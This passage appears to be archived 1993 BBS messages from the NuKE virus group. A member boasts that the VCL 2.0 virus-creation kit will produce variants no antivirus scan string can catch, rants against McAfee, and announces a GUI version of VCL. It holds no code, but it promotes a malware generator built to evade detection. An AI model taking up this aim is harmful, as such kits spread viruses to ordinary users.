Because It is a market advantage! Remember MtE???? Who was the first person to
get "applause" for detecting it, Scan ofcourse! Remember VCL 1.0, Gary came out
whinning, he did 48hours straight to get all the varients of VCL 1.0! Naturaly
some idiot will do it! And void my copyright copy of VCL somewhere along the
lines to put it into his package! Even if a user generates "samples" on HIS
bought VCL 2.0 for McAfee, will be impossible! I will make the compiler of VCL
2.0 extremely smart, and NO SCAN STRING will beat it! you will need a
"alogorithm" method, and such a method requires the understanding of the VCL
2.0 compiler which is inside VCL 2.0, which is copyright to NuKE!

Anyhow, take this leffty example, call up you local newspapers, explain them
this, explain then that NuKE was the bad-guy once upon a time, explain them
that McAfee would tell people how "morally corrupt" NuKE was!

the end result will be a headline like "Hackers sue the morally right!"
     "Virus Hackers going after Anti-Virus makers"
This is a REAL HEADLINE! a scare dude! its something that will sell papers!
We ALREADY have a PRIME example, and his name is "Rodney King"

Sure, Cops can beat up citizens, but when a citizens beats up a cop, its a
headline! Rodney King was the best headline of 1992!

So don't give me the Bullshit!

It call comes down to ONE THING! and its called "BRAINS" and the one with the
most will ALWAYS will...

---
 * Origin: Cybernetic Voilence - NuKE WHQ - 514.426.9194 v32b (111:950/0)
============================================================================

(75)    Wed 6 Oct 93  9:54p                                    Cost: 0
By: Rock Steady, Cybernetic Violence  (111:950/0)
To: All, Cybernetic Violence (111:950/0)
Re: VCL
St: Local
------------------------------------------------------------------------------

Just wanted to post yall, that my GUI version of VCL is _almost_ done... Its
coming out nicely... After 3 days of pulling hair because of some nasty bugs in
the GUI package, I put together with the help of a book! Boy I mean NASTY
bugs...

Anyhow, SCREAMING, I'll send you a copy if its done in the next xfer! I'm ALSO
going to add in a TEXT mode, if time permits... the TEXT Interface is very
easy, and I already have a great library for it...

Anyhow, this should be out very soon...
 

---
 * Origin: Cybernetic Voilence - NuKE WHQ - 514.426.9194 v32b (111:950/0)

